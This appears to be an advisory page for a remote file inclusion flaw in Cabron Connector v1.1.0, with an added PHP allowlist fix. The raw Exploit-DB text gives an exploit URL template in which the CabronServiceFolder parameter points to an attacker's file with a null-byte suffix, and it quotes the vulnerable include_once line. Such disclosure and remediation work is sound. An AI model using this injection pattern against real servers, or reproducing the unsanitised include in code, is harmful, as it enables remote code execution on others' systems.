Vendor: Cabron Connector
By: Dj7xpl
CVSS: 7.5 HIGH
CWE: Remote File Inclusion Vuln
Product Name: Cabron Connector
Affected Version From: 1.1.2000
Affected Version To: 1.1.2000
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Cabron Connector v1.1.0

Cabron Connector v1.1.0 is vulnerable to remote file inclusion. The 'CabronServiceFolder' parameter of 'inclusionService.php' is used directly in the path of an include_once() statement, so malicious input in that parameter allows an attacker to include arbitrary files from remote servers.

Mitigation:

To mitigate this vulnerability, sanitize and validate user input before using it in include statements. It is also advised to keep the software up to date with the latest patches and security updates.
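
One way to apply this mitigation to the include in inclusionService.php, as an added example that is not Cabron Connector's own code: the request parameter only selects a folder from an allowlist, and the resolved path is checked for containment before it is included. The constants, folder names and function name are assumptions for illustration.

```php
<?php
// Added example. SERVICES_ROOT, ALLOWED_SERVICE_FOLDERS and
// resolveServiceInclude() are hypothetical names, not part of the product.

// Vulnerable pattern quoted in the advisory, for comparison (do not use):
//   include_once("$CabronServiceFolder/lib/includedFunction.php");

const SERVICES_ROOT = __DIR__ . '/services';          // assumed install layout
const ALLOWED_SERVICE_FOLDERS = ['samples', 'core'];  // assumed folder names

/**
 * Map a requested folder name to a file under SERVICES_ROOT, or return null.
 */
function resolveServiceInclude(string $requested): ?string
{
    // 1. Allowlist: the request selects a known folder, it never supplies a path.
    //    Strict comparison rejects URLs, "../" and embedded NUL bytes alike.
    if (!in_array($requested, ALLOWED_SERVICE_FOLDERS, true)) {
        return null;
    }

    // 2. Build the path from server-side constants only, then canonicalise it.
    $root   = realpath(SERVICES_ROOT);
    $target = realpath(SERVICES_ROOT . '/' . $requested . '/lib/includedFunction.php');
    if ($root === false || $target === false) {
        return null; // file missing or root misconfigured
    }

    // 3. Containment: after symlink resolution the file must still sit under root.
    if (strncmp($target, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Read the value from the request explicitly rather than from an
// implicitly populated global variable.
$requested = isset($_GET['CabronServiceFolder']) && is_string($_GET['CabronServiceFolder'])
    ? $_GET['CabronServiceFolder'] : '';

$path = resolveServiceInclude($requested);
if ($path === null) {
    http_response_code(400);
    exit('Unknown service folder');
}
include_once $path;
```

As a second layer, keeping `allow_url_include = Off` in php.ini (the default since PHP 5.2) stops include statements from fetching remote URLs even if a path check is missed.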

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                   Cabron Connector v1.1.0 
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Author :   Dj7xpl / Dj7xpl[at]Yahoo[dot]com
* Type :     Remote File Inclusion Vuln
* Download:  http://cabron.sourceforge.net
* Vuln:      http://[Target]/[Path]/services/samples/inclusionService.php?CabronServiceFolder=[EvilTxt]%00

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Vuln Code: 
             include_once("$CabronServiceFolder/lib/includedFunction.php");   <== Line(1)

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-17]